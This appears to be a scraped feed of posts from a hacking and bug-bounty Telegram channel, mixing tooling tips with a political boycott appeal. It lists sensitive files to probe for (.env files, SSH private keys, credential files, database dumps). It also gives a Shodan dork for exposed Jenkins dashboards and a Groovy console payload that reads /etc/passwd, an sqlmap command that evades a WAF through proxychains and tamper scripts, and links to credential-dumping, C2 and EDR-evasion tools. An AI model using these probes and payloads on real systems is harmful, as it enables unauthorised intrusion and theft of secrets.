Important environment files and variables
.env
.env.local
.env.dev
.env.production
.env.staging
.env.testing
.env.example
.env.backup
.env.bak
.env.old
.env~
.env.default
/opt/app/.env
/home/user/.env
Backup files and old versions
index.php.bak
config.old
config.bak
database.sql.gz
database_backup.sql
database_dump.sql
database_export.sql
wp-config.php~
.htpasswd.bak
.htpasswd.old
.htaccess.bak
.htaccess.old
admin.bak
backup.zip
backup.tar.gz
backup.sql
backup_old.sql
old_version.zip
old_config.php
Log and debug files
debug.log
error.log
access.log
server.log
php_errors.log
trace.log
system.log
log.txt
logs/debug.log
logs/error.log
logs/system.log
logs/app.log
Private key files and API keys
id_rsa
id_rsa.pub
id_dsa
id_ecdsa
id_ed25519
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/authorized_keys
secrets.json
apikey.txt
google-cloud.json
aws-credentials
jwt_private.pem
jwt_public.pem
private.key
public.key
Miscellaneous files worth testing
composer.lock
composer.json
package.json
package-lock.json
.bash_history
.bashrc
.zshrc
.gitignore
.gitconfig
.gitattributes
.idea/workspace.xml
.vscode/settings.json
.vscode/launch.json
.vscode/tasks.json
Dockerfile
docker-compose.yml
nginx.conf
apache2.conf
httpd.conf
php.ini
robots.txt
sitemap.xml
sitemap_index.xml
crossdomain.xml
security.txt
CORS
Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
#BugBounty #bugbountytips #RCE
Hello everyone, use my custom and advanced Recon Engine:
https://haxshadow.github.io/reconengine/
Bypass SQL union select
#Bypass #SQL
Master Wordpress Penetration Testing.pdf
6 MB
🔍 Master WordPress Penetration Testing – Secure & Exploit Like a Pro! 💻🚀
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
HackTheBox Certified Penetration Tester Specialist Cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
ModSecurity WAF is so easy to bypass!
I used proxychains because the site was blocking my IP after just a few attempts.
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
XSS Hunting with Burp Suite: A Practical Guide:
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
Red Team Tools 🔥
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
🕊 Peace for Palestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
It is not possible to damage a cyber power like Israel by taking down a couple of cyber attacks or useless websites.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
I uploaded a new video; go to my new Telegram channel: https://t.iss.one/haxshadow
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
This is my group; add this:
https://t.iss.one/shdowgp